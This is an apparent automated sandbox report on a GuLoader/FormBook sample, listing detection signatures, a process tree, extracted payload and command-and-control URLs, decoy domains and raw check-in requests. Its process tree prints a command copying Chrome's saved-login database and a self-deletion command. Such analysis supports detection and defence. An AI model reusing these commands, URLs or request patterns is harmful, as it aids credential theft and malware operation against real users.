Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report BL_CI_PL.exe

Overview

General Information

Sample Name:BL_CI_PL.exe
Analysis ID:530346
MD5:75a9a6347c5ae5d8bd464c195b9802bb
SHA1:96da47f0e279f810714afdc362c15f2e0eae6dd7
SHA256:02854ef9c13129f6336db1b1d33b5255a88a5657b5e66ebda12b733a2c421ff7
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Tries to resolve many domain names, but no domain seems valid
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • BL_CI_PL.exe (PID: 1880 cmdline: "C:\Users\user\Desktop\BL_CI_PL.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
    • BL_CI_PL.exe (PID: 432 cmdline: "C:\Users\user\Desktop\BL_CI_PL.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
      • explorer.exe (PID: 4528 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • k4n8p7lb.exe (PID: 5888 cmdline: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
          • k4n8p7lb.exe (PID: 3200 cmdline: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
        • k4n8p7lb.exe (PID: 5096 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
          • k4n8p7lb.exe (PID: 5788 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
        • NETSTAT.EXE (PID: 4520 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 9DB170ED520A6DD57B5AC92EC537368A)
        • wscript.exe (PID: 380 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
        • k4n8p7lb.exe (PID: 8012 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
          • k4n8p7lb.exe (PID: 3016 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
        • k4n8p7lb.exe (PID: 7704 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
          • k4n8p7lb.exe (PID: 7216 cmdline: "C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe" MD5: 75A9A6347C5AE5D8BD464C195B9802BB)
      • ipconfig.exe (PID: 4888 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
        • cmd.exe (PID: 384 cmdline: /c del "C:\Users\user\Desktop\BL_CI_PL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • cmd.exe (PID: 4948 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • firefox.exe (PID: 7688 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://bgreenidaho.com/Newfile/bin_UFDek247.bin"}

Threatname: FormBook

{"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000000.28530443036.0000000022327000.00000004.00020000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x36d4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000001F.00000002.30058808750.0000000002380000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000A.00000000.25494294503.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        Click to see the 73 entries

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 0000001F.00000002.30058808750.0000000002380000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://bgreenidaho.com/Newfile/bin_UFDek247.bin"}
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: BL_CI_PL.exeVirustotal: Detection: 19%Perma Link
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORY
        Antivirus detection for URL or domainShow sources
        Source: http://www.dif-directory.xyz/n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4cAvira URL Cloud: Label: phishing
        Source: http://www.yghdlhax.xyz/n8ds/?lZOD=prkX5vIEewOKdb4uapSD5zP9OaJ72kAqHOW75HdD0V+URkfePb3G34/1ninLd5DC/lUo&y6AH=yHQDsAvira URL Cloud: Label: phishing
        Source: http://www.yghdlhax.xyz/n8ds/Avira URL Cloud: Label: phishing
        Source: 24.0.firefox.exe.2232796c.1.unpackAvira: Label: TR/Dropper.Gen
        Source: 24.2.firefox.exe.2232796c.0.unpackAvira: Label: TR/Dropper.Gen
        Source: 29.2.wscript.exe.4f3796c.4.unpackAvira: Label: TR/Dropper.Gen
        Source: 14.2.ipconfig.exe.3f3796c.4.unpackAvira: Label: TR/Dropper.Gen
        Source: 14.2.ipconfig.exe.3591ee8.1.unpackAvira: Label: TR/Dropper.Gen
        Source: 29.2.wscript.exe.2ac9e48.1.unpackAvira: Label: TR/Dropper.Gen
        Source: 28.2.NETSTAT.EXE.2ed2880.1.unpackAvira: Label: TR/Dropper.Gen
        Source: 28.2.NETSTAT.EXE.387796c.4.unpackAvira: Label: TR/Dropper.Gen
        Source: 24.0.firefox.exe.2232796c.0.unpackAvira: Label: TR/Dropper.Gen
        Source: BL_CI_PL.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49807 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49842 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49845 version: TLS 1.2
        Source: Binary string: ipconfig.pdb source: BL_CI_PL.exe, 0000000A.00000002.26187395930.00000000000D0000.00000040.00020000.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181599405.00000000008DE000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181490143.000000000094A000.00000004.00000001.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: BL_CI_PL.exe, 0000000A.00000002.26187395930.00000000000D0000.00000040.00020000.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181599405.00000000008DE000.00000004.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000003.26181490143.000000000094A000.00000004.00000001.sdmp
        Source: Binary string: netstat.pdbGCTL source: k4n8p7lb.exe, 0000001A.00000003.29294254487.0000000000804000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29298264719.0000000000090000.00000040.00020000.sdmp
        Source: Binary string: wscript.pdbGCTL source: k4n8p7lb.exe, 0000001B.00000003.29446027834.00000000007CC000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464574091.000000001E820000.00000040.00020000.sdmp, k4n8p7lb.exe, 0000001B.00000003.29448067667.000000001E721000.00000004.00000001.sdmp
        Source: Binary string: netstat.pdb source: k4n8p7lb.exe, 0000001A.00000003.29294254487.0000000000804000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29298264719.0000000000090000.00000040.00020000.sdmp
        Source: Binary string: wntdll.pdbUGP source: BL_CI_PL.exe, 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, BL_CI_PL.exe, 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30166829665.0000000003B0D000.00000040.00000001.sdmp, ipconfig.exe, 0000000E.00000002.30165083413.00000000039E0000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000003.29297520833.0000000002FC0000.00000004.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: k4n8p7lb.exe, k4n8p7lb.exe, 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp, NETSTAT.EXE, 0000001C.00000003.29297520833.0000000002FC0000.00000004.00000001.sdmp, NETSTAT.EXE, 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, wscript.exe, wscript.exe, 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, wscript.exe, 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp
        Source: Binary string: wscript.pdb source: k4n8p7lb.exe, 0000001B.00000003.29446027834.00000000007CC000.00000004.00000001.sdmp, k4n8p7lb.exe, 0000001B.00000002.29464574091.000000001E820000.00000040.00020000.sdmp, k4n8p7lb.exe, 0000001B.00000003.29448067667.000000001E721000.00000004.00000001.sdmp
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F2FA90 FindFirstFileW,FindNextFileW,FindClose,14_2_02F2FA90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F2FA89 FindFirstFileW,FindNextFileW,FindClose,14_2_02F2FA89

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 164.155.212.139:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 164.155.212.139:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 164.155.212.139:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 35.244.144.199:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 35.244.144.199:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49816 -> 35.244.144.199:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.237.47.210:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.237.47.210:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49821 -> 34.237.47.210:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49827 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49837 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49837 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49837 -> 34.102.136.180:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.201.232:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.201.232:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.201.232:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49847 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49847 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49847 -> 216.172.172.87:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49851 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49851 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49851 -> 172.120.157.187:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49860 -> 172.67.201.232:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49860 -> 172.67.201.232:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49860 -> 172.67.201.232:80
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\explorer.exeNetwork Connect: 35.244.144.199 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 88.99.22.5 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.120.157.187 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 50.62.172.157 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 34.237.47.210 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 66.29.140.185 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 185.61.153.97 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 216.172.172.87 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 81.2.194.128 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.250 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 164.155.212.139 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 192.64.119.254 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 38.143.25.232 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 136.143.191.204 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.201.232 80Jump to behavior
        Uses netstat to query active network connections and open portsShow sources
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
        Performs DNS queries to domains with low reputationShow sources
        Source: DNS query: www.smartam6.xyz
        Source: DNS query: www.gdav130.xyz
        Source: DNS query: www.helpcloud.xyz
        Source: DNS query: www.yghdlhax.xyz
        Source: DNS query: www.32342231.xyz
        Source: DNS query: www.dif-directory.xyz
        Source: DNS query: www.32342231.xyz
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: https://bgreenidaho.com/Newfile/bin_UFDek247.bin
        Source: Malware configuration extractorURLs: www.ayudavida.com/n8ds/
        Tries to resolve many domain names, but no domain seems validShow sources
        Source: unknownDNS traffic detected: query: www.smartam6.xyz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.tvterradafarinha.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.recoverytrivia.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.theyachtmarkets.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.recruitresumelibrary.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.testwebsite0711.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.32342231.xyz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.csenmoga.com replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.3uwz9mpxk77g.biz replaycode: Server failure (2)
        Source: unknownDNS traffic detected: query: www.jobl.space replaycode: Name error (3)
        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
        Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=JCnWpsMsE1LhJoPwCBaMQ23aQlJM1lBrGqYKhWEiZBh+41Ky2Bnma6QhJDV2RS4wXNsD&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.diggingquartz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.dietatrintadias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1Host: www.mummymotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaF HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
